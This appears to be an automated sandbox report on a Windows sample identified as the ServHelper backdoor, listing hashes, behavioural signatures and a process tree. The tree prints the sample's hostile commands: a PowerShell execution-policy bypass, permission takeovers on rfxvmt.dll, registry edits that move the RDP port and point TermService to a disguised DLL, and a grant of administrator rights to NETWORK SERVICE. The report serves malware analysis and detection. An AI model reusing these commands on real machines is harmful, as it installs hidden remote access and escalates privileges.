Analysis
-
max time kernel
140s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
30-03-2024 21:36
General
-
Target
44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe
-
Size
4.2MB
-
MD5
44d42138d67d0e52c3c26cb726bc8f39
-
SHA1
2613e0e464b334ed66e34a8cffc174c5603dd1d9
-
SHA256
074d3a0bcfb3d4b0b179a2495004fb95947de60ce002fded7af1d1781add9d2b
-
SHA512
9d59b4dfb96bbe5b59f1b5c0561dafd8fe3f2fb1ababf4e7a384577ddf63adb703802187e7a7bfd671c4fd67e84214bb2b3283edae85e0f2a424148d9e0be1fa
-
SSDEEP
98304:5RDQNYpuboTrhHZw1LhIArXs7YL8WVM872qAR:5RePbo3tZw17s7YQWg
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5oa2wids.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA592.tmp"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5d5901f06a84713c86adabe83d1ee8da0
SHA1ed9c23551f7802f0832e215dbb941070ba81a3e1
SHA256299c44fd63a7f57a1e22528edee1e2cee067ef83edd846bf1d5721464459376b
SHA5124fcc7ceea13ab288d27a2f26ac592cc7cff3ad0b0463f98d9f8982c3bf80d6e05a1346cb72da15ae200ce2d97af135624df83eedc5a2283c167d97b6201f0cd8
-
Filesize
7KB
MD576e427872edc9c64a7e300d71b1b2354
SHA1bef109c048d0e55601d9ac467c938c5d89348585
SHA2564346d3165d52ac9b3a3912699f9bd7548bc233f9da6043f8f3f8242cdd505f16
SHA512092d4c34e073cfb6f5b5ed9e9881f27cbfae5eddd43c018361b58341eee00c7bd6906c7a0c884fcd1f7fc796db00b682afed0b92fda99813d02e0c908ec56c87
-
Filesize
1KB
MD586a63aff28e6394630a8faecf8212a29
SHA1a3b0307e7c08e71509b5b6efba09ebea6066344d
SHA256aa998be3fa5bac68398c0c0d2ef36b22ebfca00a19b962c993f1ba83f1bcc0df
SHA5123946ee0cf2e9abca30306f7bb8e961e4aa78123b2973178906e8a242d793244b4c0d457e4253bb3f3c3d83ccdd48a63fd4979f9ffca96e0b2b33728207572c2c
-
Filesize
2.5MB
MD5794bf0ae26a7efb0c516cf4a7692c501
SHA1c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA25697753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA51220c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
7KB
MD51969ac801f35dbaeac457b79fb884a4d
SHA1b22aaf23e8abee6da6091d9a5def33ed0ee40f57
SHA256271ffb9d6e364584964e67185d0837da916ec67a8d8d7a2dec105978c6c25ef3
SHA51225c9670244ea5722050306d542f5ae4e7cba8c73460ee22b6f127e74b9a89888f4449b4b83daad65b036e7cba5224ad85c1af800288ea252afb382a9d438352f
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD52ecfa8abbcb36496d70ae0749962b27c
SHA1460a909aacb0b8465c134a066b9e6dc25cab8535
SHA256ae60ab6963bf3c264c9036f8997d8119439a392dc8e5fd11f6c7919b9afb1719
SHA512a35b7a260a99c7aaba589e2ece88580ae89dc67f7162c5ee33c679221d79f8828447edb5fd41b06f4d750094feea736c64b39edecb73a860d421b97d3d87c628
-
Filesize
652B
MD580d278b11892a30cc946acf818d39c7d
SHA15e4c91cf5d4e77fa9229e8bef5e8ba2853966897
SHA2563ed87b753f23a11553f621fa76419784777dd29876770e8df4d75ad91cafd13c
SHA5126b47d4cef1373e1db0b3ced25de66420ab91ce0bc9205ede1e9c16a5154d13783216dca12f5bb0ecd930480cbb4fcf72e2966b7e96d3e84703ce1b719438c322
-
Filesize
4.0MB
-
Filesize
4.3MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
4.0MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB